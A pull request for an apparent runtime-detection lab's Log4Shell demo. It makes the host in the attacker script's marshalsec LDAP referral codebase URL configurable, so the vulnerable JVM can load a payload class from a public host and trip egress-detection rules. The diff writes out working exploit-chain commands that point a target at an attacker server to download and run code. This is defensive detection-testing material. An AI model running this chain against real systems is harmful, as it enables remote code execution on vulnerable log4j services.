### PR TITLE
attacker(log4j): make the LDAP referral codebase host configurable

### DIFF
--- a/example/log4j-chain/attacker/run.sh
+++ b/example/log4j-chain/attacker/run.sh
@@ -4,9 +4,16 @@ cd /attacker/www && python3 -m http.server 8888 &
 HTTP_PID=$!
 
 # marshalsec LDAP referral server on :1389. Returns a CodebaseRef to the HTTP
-# URL above, which the vulnerable log4j JVM dereferences and loads.
-java -cp /attacker/marshalsec.jar marshalsec.jndi.LDAPRefServer \
-    "http://attacker.attacker-ns.svc.cluster.local:8888/#Payload" 1389 &
+# URL below, which the vulnerable log4j JVM dereferences and loads.
+#
+# The codebase host is configurable so the same image runs anywhere:
+#   CODEBASE_URL   full override, e.g. http://my-host:8888/#Payload
+#   CODEBASE_HOST  just the host   (default: the in-cluster attacker service)
+# An external/public host is what makes the backend's egress non-private, so
+# R0011 (unexpected egress) fires. Unset = identical to the previous behavior.
+: "${CODEBASE_URL:=http://${CODEBASE_HOST:-attacker.attacker-ns.svc.cluster.local}:8888/#Payload}"
+echo "[attacker] LDAP referral codebase = $CODEBASE_URL"
+java -cp /attacker/marshalsec.jar marshalsec.jndi.LDAPRefServer "$CODEBASE_URL" 1389 &
 LDAP_PID=$!
 
 trap 'kill $HTTP_PID $LDAP_PID 2>/dev/null' INT TERM


### PR DESCRIPTION
`example/log4j-chain/attacker/run.sh` hardcodes the marshalsec codebase URL to `attacker.attacker-ns.svc.cluster.local:8888`, so the attacker image only works when run as the in-cluster pod.

This makes the codebase host **env-driven** so the same image runs anywhere:
- `CODEBASE_HOST` — just the host (default: the in-cluster attacker service)
- `CODEBASE_URL` — full override (e.g. `http://my-public-host:8888/#Payload`)

**Why:** R0011 (unexpected egress) skips private/ClusterIP targets, so to demonstrate the *network* side of Log4Shell detection (LDAP call-out + class download as out-of-profile egress) the attacker must be reachable at a **non-private/public** address. With the codebase hardcoded to the ClusterIP service, that's impossible without rebuilding.

**Backward compatible:** with neither variable set, the referral URL is byte-identical to before.

Verified live on a k3s rig with sbob-rc3: with `CODEBASE_HOST` pointed at a public host, the backend's egress to the attacker trips R0011, alongside R0001 (RCE) and R0005 (DNS exfil).

Merging this rebuilds the official `log4j-chain-attacker` image via `ci-log4j-chain-images.yaml`.